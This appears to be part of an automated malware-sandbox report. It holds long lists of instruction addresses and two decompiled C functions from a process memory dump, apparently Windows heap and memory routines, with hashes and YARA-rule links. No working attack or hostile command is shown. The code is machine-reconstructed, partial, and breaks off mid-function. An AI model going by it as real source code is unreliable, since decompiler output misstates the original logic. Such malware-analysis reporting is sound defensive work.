                                                                                        0x00bdd640
                                                                                        0x00bdd8bf
                                                                                        0x00000000
                                                                                        0x00bdd646
                                                                                        0x00bdd646
                                                                                        0x00bdd64d
                                                                                        0x00bdd652
                                                                                        0x00c2b2fc
                                                                                        0x00c2b2fc
                                                                                        0x00c2b302
                                                                                        0x00c2b33b
                                                                                        0x00c2b341
                                                                                        0x00000000
                                                                                        0x00c2b304
                                                                                        0x00c2b304
                                                                                        0x00c2b319
                                                                                        0x00c2b31e
                                                                                        0x00c2b324
                                                                                        0x00c2b326
                                                                                        0x00c2b332
                                                                                        0x00c2b347
                                                                                        0x00c2b34c
                                                                                        0x00c2b351
                                                                                        0x00c2b35a
                                                                                        0x00000000
                                                                                        0x00c2b328
                                                                                        0x00c2b328
                                                                                        0x00000000
                                                                                        0x00c2b328
                                                                                        0x00c2b326
                                                                                        0x00bdd658
                                                                                        0x00bdd658
                                                                                        0x00bdd65b
                                                                                        0x00bdd665
                                                                                        0x00000000
                                                                                        0x00bdd66b
                                                                                        0x00bdd66b
                                                                                        0x00bdd66b
                                                                                        0x00bdd66b
                                                                                        0x00bdd66d
                                                                                        0x00bdd672
                                                                                        0x00bdd67a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bdd680
                                                                                        0x00bdd686
                                                                                        0x00bdd8ce
                                                                                        0x00bdd8d4
                                                                                        0x00bdd8dd
                                                                                        0x00bdd8e0
                                                                                        0x00bdd68c
                                                                                        0x00bdd691
                                                                                        0x00bdd69d
                                                                                        0x00bdd6a2
                                                                                        0x00bdd6a7
                                                                                        0x00bdd6b0
                                                                                        0x00bdd6b5
                                                                                        0x00bdd6e0
                                                                                        0x00bdd6b7
                                                                                        0x00bdd6b7
                                                                                        0x00bdd6b9
                                                                                        0x00bdd6b9
                                                                                        0x00bdd6bb
                                                                                        0x00bdd6bd
                                                                                        0x00bdd6ce
                                                                                        0x00bdd6d0
                                                                                        0x00bdd6d2
                                                                                        0x00c2b363
                                                                                        0x00c2b365
                                                                                        0x00000000
                                                                                        0x00c2b36b
                                                                                        0x00000000
                                                                                        0x00c2b36b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bdd6bf
                                                                                        0x00bdd6bf
                                                                                        0x00bdd6e5
                                                                                        0x00bdd6e7
                                                                                        0x00bdd6e9
                                                                                        0x00bdd6ec
                                                                                        0x00bdd6ec
                                                                                        0x00bdd6ef
                                                                                        0x00bdd6f5
                                                                                        0x00bdd6f9
                                                                                        0x00bdd6fb
                                                                                        0x00bdd6fd
                                                                                        0x00bdd701
                                                                                        0x00bdd703
                                                                                        0x00bdd70a
                                                                                        0x00bdd70a
                                                                                        0x00bdd701
                                                                                        0x00bdd710
                                                                                        0x00bdd710
                                                                                        0x00bdd6c1
                                                                                        0x00bdd6c1
                                                                                        0x00bdd6c6
                                                                                        0x00c2b36d
                                                                                        0x00c2b36f
                                                                                        0x00000000
                                                                                        0x00c2b375
                                                                                        0x00c2b375
                                                                                        0x00c2b375
                                                                                        0x00000000
                                                                                        0x00c2b375
                                                                                        0x00000000
                                                                                        0x00bdd6cc
                                                                                        0x00bdd6d8
                                                                                        0x00bdd6d8
                                                                                        0x00bdd6d8
                                                                                        0x00000000
                                                                                        0x00bdd6c6
                                                                                        0x00bdd6bf
                                                                                        0x00000000
                                                                                        0x00bdd6da
                                                                                        0x00bdd6da
                                                                                        0x00bdd716
                                                                                        0x00bdd71b
                                                                                        0x00bdd720
                                                                                        0x00bdd726
                                                                                        0x00bdd726
                                                                                        0x00bdd72d
                                                                                        0x00000000
                                                                                        0x00bdd733
                                                                                        0x00bdd739
                                                                                        0x00bdd742
                                                                                        0x00bdd750
                                                                                        0x00bdd758
                                                                                        0x00bdd764
                                                                                        0x00bdd776
                                                                                        0x00bdd77a
                                                                                        0x00bdd783
                                                                                        0x00bdd928
                                                                                        0x00bdd92c
                                                                                        0x00bdd93d
                                                                                        0x00bdd944
                                                                                        0x00bdd94f
                                                                                        0x00bdd954
                                                                                        0x00bdd956
                                                                                        0x00bdd95f
                                                                                        0x00bdd961
                                                                                        0x00bdd973
                                                                                        0x00bdd973
                                                                                        0x00bdd956
                                                                                        0x00bdd944
                                                                                        0x00bdd92c
                                                                                        0x00bdd78b
                                                                                        0x00c2b394
                                                                                        0x00bdd791
                                                                                        0x00bdd798
                                                                                        0x00c2b3a3
                                                                                        0x00c2b3bb
                                                                                        0x00c2b3bb
                                                                                        0x00bdd7a5
                                                                                        0x00bdd866
                                                                                        0x00bdd870
                                                                                        0x00bdd892
                                                                                        0x00bdd898
                                                                                        0x00bdd89e
                                                                                        0x00bdd8a0
                                                                                        0x00bdd8a6
                                                                                        0x00bdd8ac
                                                                                        0x00bdd8ae
                                                                                        0x00bdd8b4
                                                                                        0x00bdd8b4
                                                                                        0x00bdd8ae
                                                                                        0x00bdd7a5
                                                                                        0x00bdd78b
                                                                                        0x00bdd7b1
                                                                                        0x00c2b3c5
                                                                                        0x00c2b3c5
                                                                                        0x00bdd7c3
                                                                                        0x00bdd7ca
                                                                                        0x00bdd7e5
                                                                                        0x00bdd7eb
                                                                                        0x00bdd8eb
                                                                                        0x00bdd8ed
                                                                                        0x00000000
                                                                                        0x00bdd8f3
                                                                                        0x00bdd8f3
                                                                                        0x00bdd8f3
                                                                                        0x00000000
                                                                                        0x00bdd8ed
                                                                                        0x00bdd7cc
                                                                                        0x00bdd7cc
                                                                                        0x00bdd7d2
                                                                                        0x00000000
                                                                                        0x00bdd7d4
                                                                                        0x00bdd7d4
                                                                                        0x00bdd7d7
                                                                                        0x00bdd7df
                                                                                        0x00c2b3d4
                                                                                        0x00c2b3d9
                                                                                        0x00c2b3dc
                                                                                        0x00c2b3dc
                                                                                        0x00c2b3df
                                                                                        0x00c2b3e2
                                                                                        0x00c2b468
                                                                                        0x00c2b46d
                                                                                        0x00c2b46f
                                                                                        0x00c2b46f
                                                                                        0x00c2b475
                                                                                        0x00bdd8f8
                                                                                        0x00bdd8f9
                                                                                        0x00bdd8fd
                                                                                        0x00c2b3e8
                                                                                        0x00c2b3e8
                                                                                        0x00c2b3eb
                                                                                        0x00c2b3ed
                                                                                        0x00000000
                                                                                        0x00c2b3ef
                                                                                        0x00c2b3ef
                                                                                        0x00c2b3f1
                                                                                        0x00c2b3f4
                                                                                        0x00c2b3fe
                                                                                        0x00c2b404
                                                                                        0x00c2b409
                                                                                        0x00c2b40e
                                                                                        0x00c2b410
                                                                                        0x00c2b410
                                                                                        0x00c2b414
                                                                                        0x00c2b414
                                                                                        0x00c2b41b
                                                                                        0x00c2b420
                                                                                        0x00c2b423
                                                                                        0x00c2b425
                                                                                        0x00c2b427
                                                                                        0x00c2b42a
                                                                                        0x00c2b42d
                                                                                        0x00c2b42d
                                                                                        0x00c2b42a
                                                                                        0x00c2b432
                                                                                        0x00c2b436
                                                                                        0x00c2b438
                                                                                        0x00c2b43b
                                                                                        0x00c2b43b
                                                                                        0x00c2b449
                                                                                        0x00c2b44e
                                                                                        0x00c2b454
                                                                                        0x00c2b458
                                                                                        0x00c2b458
                                                                                        0x00c2b45d
                                                                                        0x00000000
                                                                                        0x00c2b45d
                                                                                        0x00c2b3ed
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bdd7df
                                                                                        0x00bdd7d2
                                                                                        0x00bdd7ca
                                                                                        0x00c2b37c
                                                                                        0x00c2b37e
                                                                                        0x00c2b385
                                                                                        0x00c2b38a
                                                                                        0x00000000
                                                                                        0x00c2b38a
                                                                                        0x00bdd742
                                                                                        0x00bdd7f1
                                                                                        0x00bdd7f8
                                                                                        0x00c2b49b
                                                                                        0x00c2b49b
                                                                                        0x00bdd800
                                                                                        0x00bdd837
                                                                                        0x00bdd843
                                                                                        0x00bdd845
                                                                                        0x00bdd847
                                                                                        0x00bdd84a
                                                                                        0x00bdd84b
                                                                                        0x00bdd84e
                                                                                        0x00bdd857
                                                                                        0x00bdd818
                                                                                        0x00bdd824
                                                                                        0x00bdd831
                                                                                        0x00c2b4a5
                                                                                        0x00c2b4ab
                                                                                        0x00c2b4b3
                                                                                        0x00c2b4b8
                                                                                        0x00c2b4bb
                                                                                        0x00000000
                                                                                        0x00c2b4c1
                                                                                        0x00c2b4c1
                                                                                        0x00c2b4c8
                                                                                        0x00000000
                                                                                        0x00c2b4ce
                                                                                        0x00c2b4d4
                                                                                        0x00c2b4e1
                                                                                        0x00c2b4e3
                                                                                        0x00c2b4e5
                                                                                        0x00000000
                                                                                        0x00c2b4eb
                                                                                        0x00c2b4f0
                                                                                        0x00c2b4f2
                                                                                        0x00bddac9
                                                                                        0x00bddacc
                                                                                        0x00bddacf
                                                                                        0x00bddad1
                                                                                        0x00bddd78
                                                                                        0x00bddd78
                                                                                        0x00bddcf2
                                                                                        0x00000000
                                                                                        0x00bddad7
                                                                                        0x00bddad9
                                                                                        0x00bddadb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bddae1
                                                                                        0x00bddae1
                                                                                        0x00bddae4
                                                                                        0x00bddae6
                                                                                        0x00c2b4f9
                                                                                        0x00c2b4f9
                                                                                        0x00c2b500
                                                                                        0x00bddaec
                                                                                        0x00bddaec
                                                                                        0x00bddaf5
                                                                                        0x00bddaf8
                                                                                        0x00bddafb
                                                                                        0x00bddb03
                                                                                        0x00bddb11
                                                                                        0x00bddb16
                                                                                        0x00bddb19
                                                                                        0x00bddb1b
                                                                                        0x00c2b52c
                                                                                        0x00c2b531
                                                                                        0x00c2b534
                                                                                        0x00bddb21
                                                                                        0x00bddb21
                                                                                        0x00bddb24
                                                                                        0x00bddcd9
                                                                                        0x00bddce2
                                                                                        0x00bddce5
                                                                                        0x00bddd6a
                                                                                        0x00bddd6d
                                                                                        0x00000000
                                                                                        0x00bddd73
                                                                                        0x00c2b51a
                                                                                        0x00c2b51c
                                                                                        0x00c2b51f
                                                                                        0x00c2b524
                                                                                        0x00000000
                                                                                        0x00c2b524
                                                                                        0x00bddce7
                                                                                        0x00bddce7
                                                                                        0x00bddce7
                                                                                        0x00000000
                                                                                        0x00bddce7
                                                                                        0x00000000
                                                                                        0x00bddb2a
                                                                                        0x00bddb2c
                                                                                        0x00bddb31
                                                                                        0x00bddb33
                                                                                        0x00bddb36
                                                                                        0x00bddb39
                                                                                        0x00bddb3b
                                                                                        0x00bddb66
                                                                                        0x00bddb66
                                                                                        0x00bddb3d
                                                                                        0x00bddb3d
                                                                                        0x00bddb3e
                                                                                        0x00bddb46
                                                                                        0x00bddb47
                                                                                        0x00bddb49
                                                                                        0x00bddb4c
                                                                                        0x00bddb53
                                                                                        0x00bddb55
                                                                                        0x00bddb58
                                                                                        0x00bddb5a
                                                                                        0x00c2b50a
                                                                                        0x00c2b50f
                                                                                        0x00c2b512
                                                                                        0x00bddb60
                                                                                        0x00bddb60
                                                                                        0x00bddb63
                                                                                        0x00bddb63
                                                                                        0x00000000
                                                                                        0x00bddb63
                                                                                        0x00bddb5a
                                                                                        0x00bddb3b
                                                                                        0x00bddb24
                                                                                        0x00bddb69
                                                                                        0x00bddb69
                                                                                        0x00bddb6c
                                                                                        0x00bddb6f
                                                                                        0x00bddb74
                                                                                        0x00c2b557
                                                                                        0x00c2b557
                                                                                        0x00c2b55e
                                                                                        0x00bddb7a
                                                                                        0x00bddb7c
                                                                                        0x00bddb7f
                                                                                        0x00bddb82
                                                                                        0x00bddb85
                                                                                        0x00000000
                                                                                        0x00bddb8b
                                                                                        0x00bddb8b
                                                                                        0x00bddb8d
                                                                                        0x00bddb9b
                                                                                        0x00bddb9b
                                                                                        0x00bddb9d
                                                                                        0x00bddba0
                                                                                        0x00bddba2
                                                                                        0x00bddba4
                                                                                        0x00bddba7
                                                                                        0x00bddba9
                                                                                        0x00bddbae
                                                                                        0x00bddbae
                                                                                        0x00bddbb1
                                                                                        0x00bddbb4
                                                                                        0x00bddbb4
                                                                                        0x00bddbb7
                                                                                        0x00bddbba
                                                                                        0x00bddcd2
                                                                                        0x00bddcd4
                                                                                        0x00000000
                                                                                        0x00bddbc0
                                                                                        0x00bddbc0
                                                                                        0x00bddbd2
                                                                                        0x00bddbd7
                                                                                        0x00bddbda
                                                                                        0x00bddbdd
                                                                                        0x00bddbdf
                                                                                        0x00000000
                                                                                        0x00bddbe5
                                                                                        0x00bddbe5
                                                                                        0x00bddbee
                                                                                        0x00bddbf1
                                                                                        0x00c2b541
                                                                                        0x00c2b544
                                                                                        0x00000000
                                                                                        0x00c2b546
                                                                                        0x00c2b546
                                                                                        0x00000000
                                                                                        0x00c2b546
                                                                                        0x00bddbf7
                                                                                        0x00bddbf7
                                                                                        0x00bddbfd
                                                                                        0x00bddbfd
                                                                                        0x00bddbff
                                                                                        0x00bddc0b
                                                                                        0x00bddc15
                                                                                        0x00bddc1b
                                                                                        0x00bddc1d
                                                                                        0x00bddc21
                                                                                        0x00bddc21
                                                                                        0x00bddc23
                                                                                        0x00bddc23
                                                                                        0x00bddc26
                                                                                        0x00bddc29
                                                                                        0x00bddc2b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bddc31
                                                                                        0x00bddc34
                                                                                        0x00bddc36
                                                                                        0x00bddcbf
                                                                                        0x00bddcbf
                                                                                        0x00bddcc2
                                                                                        0x00000000
                                                                                        0x00bddc3c
                                                                                        0x00bddc41
                                                                                        0x00bddc43
                                                                                        0x00000000
                                                                                        0x00bddc45
                                                                                        0x00bddc45
                                                                                        0x00bddc47
                                                                                        0x00000000
                                                                                        0x00bddc4d
                                                                                        0x00bddc4d
                                                                                        0x00bddc50
                                                                                        0x00bddc52
                                                                                        0x00bddc55
                                                                                        0x00bddcfa
                                                                                        0x00bddcfe
                                                                                        0x00bddd08
                                                                                        0x00bddd0a
                                                                                        0x00bddd0c
                                                                                        0x00000000
                                                                                        0x00bddd12
                                                                                        0x00bddd15
                                                                                        0x00bddd2d
                                                                                        0x00bddd2f
                                                                                        0x00bddd32
                                                                                        0x00bddd35
                                                                                        0x00000000
                                                                                        0x00bddd35
                                                                                        0x00bddc5b
                                                                                        0x00bddc5b
                                                                                        0x00bddc5e
                                                                                        0x00bddc61
                                                                                        0x00bddc64
                                                                                        0x00bddc67
                                                                                        0x00bddc67
                                                                                        0x00bddc6a
                                                                                        0x00bddc6c
                                                                                        0x00bddc8e
                                                                                        0x00bddc8e
                                                                                        0x00bddc91
                                                                                        0x00bddc93
                                                                                        0x00bddcce
                                                                                        0x00bddcce
                                                                                        0x00bddc95
                                                                                        0x00bddc9c
                                                                                        0x00bddc6e
                                                                                        0x00bddc72
                                                                                        0x00bddc75
                                                                                        0x00bddc77
                                                                                        0x00bddc79
                                                                                        0x00c2b551
                                                                                        0x00c2b551
                                                                                        0x00000000
                                                                                        0x00bddc7f
                                                                                        0x00bddc7f
                                                                                        0x00bddc81
                                                                                        0x00000000
                                                                                        0x00bddc83
                                                                                        0x00bddc86
                                                                                        0x00bddc88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bddc88
                                                                                        0x00bddc81
                                                                                        0x00bddc79
                                                                                        0x00bddc6c
                                                                                        0x00bddc55
                                                                                        0x00bddc47
                                                                                        0x00bddc43
                                                                                        0x00000000
                                                                                        0x00bddc36
                                                                                        0x00bddc23
                                                                                        0x00000000
                                                                                        0x00bddbff
                                                                                        0x00bddbf1
                                                                                        0x00bddbdf
                                                                                        0x00bddb8f
                                                                                        0x00bddb92
                                                                                        0x00bddb95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bddb95
                                                                                        0x00bddb8d
                                                                                        0x00bddb85
                                                                                        0x00bddb74
                                                                                        0x00bddc9f
                                                                                        0x00bddca2
                                                                                        0x00bddcb0
                                                                                        0x00bddcb0
                                                                                        0x00bddad1
                                                                                        0x00c2b4e5
                                                                                        0x00c2b4c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bdd831
                                                                                        0x00000000
                                                                                        0x00bdd800
                                                                                        0x00c2b47f
                                                                                        0x00c2b485
                                                                                        0x00000000
                                                                                        0x00c2b485
                                                                                        0x00bdd665
                                                                                        0x00bdd652
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P/v$`*v
                                                                                        • API String ID: 0-2405138221
                                                                                        • Opcode ID: 5f02a6cc027a19d6a57ed7f0f1d8b4c583e41df2f6cdcd380540acce3514f80b
                                                                                        • Instruction ID: 2ed987ce28c5e961766455333d025cd955c144fcf33420187e446be214d24b36
                                                                                        • Opcode Fuzzy Hash: 5f02a6cc027a19d6a57ed7f0f1d8b4c583e41df2f6cdcd380540acce3514f80b
                                                                                        • Instruction Fuzzy Hash: DEE1AF30A006698FDB24DB28C890BA9F7F5BF45304F1442EAE94997391EB70AE85DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C8E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E00C8E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00C8BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00C8BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00C8AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00C09730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00C8A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00C8A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00C09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00C8A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00C8A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00BE2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00BDB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00BDFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00BE7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00C7FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                        0x00c8e547
                                                                                        0x00c8e549
                                                                                        0x00c8e54f
                                                                                        0x00c8e553
                                                                                        0x00c8e557
                                                                                        0x00c8e55a
                                                                                        0x00c8e55c
                                                                                        0x00c8e55f
                                                                                        0x00c8e561
                                                                                        0x00c8e567
                                                                                        0x00c8e56b
                                                                                        0x00c8e7e2
                                                                                        0x00000000
                                                                                        0x00c8e571
                                                                                        0x00c8e575
                                                                                        0x00c8e577
                                                                                        0x00c8e57b
                                                                                        0x00c8e57c
                                                                                        0x00c8e57d
                                                                                        0x00c8e57e
                                                                                        0x00c8e57f
                                                                                        0x00c8e588
                                                                                        0x00c8e58f
                                                                                        0x00c8e591
                                                                                        0x00c8e592
                                                                                        0x00c8e592
                                                                                        0x00c8e596
                                                                                        0x00c8e59e
                                                                                        0x00c8e5a0
                                                                                        0x00c8e5a6
                                                                                        0x00c8e61d
                                                                                        0x00c8e61d
                                                                                        0x00c8e621
                                                                                        0x00c8e623
                                                                                        0x00c8e630
                                                                                        0x00c8e630
                                                                                        0x00c8e7e6
                                                                                        0x00c8e7eb
                                                                                        0x00c8e7ed
                                                                                        0x00c8e7f4
                                                                                        0x00c8e7fa
                                                                                        0x00c8e7ff
                                                                                        0x00c8e7ff
                                                                                        0x00c8e80a
                                                                                        0x00c8e812
                                                                                        0x00c8e812
                                                                                        0x00c8e5ab
                                                                                        0x00c8e5b4
                                                                                        0x00c8e5b9
                                                                                        0x00c8e5be
                                                                                        0x00c8e5c0
                                                                                        0x00c8e5c2
                                                                                        0x00c8e5c8
                                                                                        0x00c8e5c9
                                                                                        0x00c8e5cb
                                                                                        0x00c8e5cc
                                                                                        0x00c8e5d5
                                                                                        0x00c8e5e4
                                                                                        0x00c8e5f1
                                                                                        0x00c8e5f8
                                                                                        0x00c8e5f8
                                                                                        0x00c8e5d5
                                                                                        0x00c8e602
                                                                                        0x00c8e616
                                                                                        0x00c8e63d
                                                                                        0x00c8e644
                                                                                        0x00c8e64d
                                                                                        0x00c8e652
                                                                                        0x00c8e657
                                                                                        0x00c8e659
                                                                                        0x00c8e65b
                                                                                        0x00c8e661
                                                                                        0x00c8e662
                                                                                        0x00c8e664
                                                                                        0x00c8e665
                                                                                        0x00c8e66e
                                                                                        0x00c8e67d
                                                                                        0x00c8e68a
                                                                                        0x00c8e691
                                                                                        0x00c8e691
                                                                                        0x00c8e66e
                                                                                        0x00c8e6b0
                                                                                        0x00000000
                                                                                        0x00c8e6b6
                                                                                        0x00c8e6bd
                                                                                        0x00c8e6c7
                                                                                        0x00c8e6d7
                                                                                        0x00c8e6d9
                                                                                        0x00c8e6db
                                                                                        0x00c8e6de
                                                                                        0x00c8e6e3
                                                                                        0x00c8e6f3
                                                                                        0x00c8e6fc
                                                                                        0x00c8e700
                                                                                        0x00c8e700
                                                                                        0x00c8e704
                                                                                        0x00c8e70a
                                                                                        0x00c8e70a
                                                                                        0x00c8e713
                                                                                        0x00c8e716
                                                                                        0x00c8e719
                                                                                        0x00c8e720
                                                                                        0x00c8e761
                                                                                        0x00c8e76b
                                                                                        0x00c8e774
                                                                                        0x00c8e77a
                                                                                        0x00c8e77a
                                                                                        0x00c8e78a
                                                                                        0x00c8e791
                                                                                        0x00c8e799
                                                                                        0x00c8e79b
                                                                                        0x00c8e79f
                                                                                        0x00c8e7aa
                                                                                        0x00c8e7c0
                                                                                        0x00c8e7ac
                                                                                        0x00c8e7b2
                                                                                        0x00c8e7b9
                                                                                        0x00c8e7b9
                                                                                        0x00c8e7c7
                                                                                        0x00c8e806
                                                                                        0x00000000
                                                                                        0x00c8e7c9
                                                                                        0x00c8e7d1
                                                                                        0x00c8e7d8
                                                                                        0x00000000
                                                                                        0x00c8e7d8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c8e722
                                                                                        0x00c8e72e
                                                                                        0x00c8e748
                                                                                        0x00c8e74c
                                                                                        0x00c8e754
                                                                                        0x00c8e756
                                                                                        0x00c8e75c
                                                                                        0x00c8e75c
                                                                                        0x00000000
                                                                                        0x00c8e75c
                                                                                        0x00c8e758
                                                                                        0x00c8e758
                                                                                        0x00000000
                                                                                        0x00c8e758
                                                                                        0x00c8e750
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c8e752
                                                                                        0x00000000
                                                                                        0x00c8e752
                                                                                        0x00c8e730
                                                                                        0x00c8e735
                                                                                        0x00c8e73d
                                                                                        0x00c8e73f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c8e741
                                                                                        0x00c8e741
                                                                                        0x00000000
                                                                                        0x00c8e741
                                                                                        0x00c8e739
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c8e73b
                                                                                        0x00000000
                                                                                        0x00c8e73b
                                                                                        0x00c8e722
                                                                                        0x00c8e720
                                                                                        0x00c8e6b0
                                                                                        0x00c8e618
                                                                                        0x00000000
                                                                                        0x00c8e618

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                        • Instruction ID: ec61790264c84c21d76bf26535ae762ea75df704aed5036f5cef93630ed905d4
                                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                        • Instruction Fuzzy Hash: 1491A0312083429FE724EF25C845B2BB7E5BF84718F14892DF9A9CB281E774E904CB56
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E00C451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xca05f0);
				E00C1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00BDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
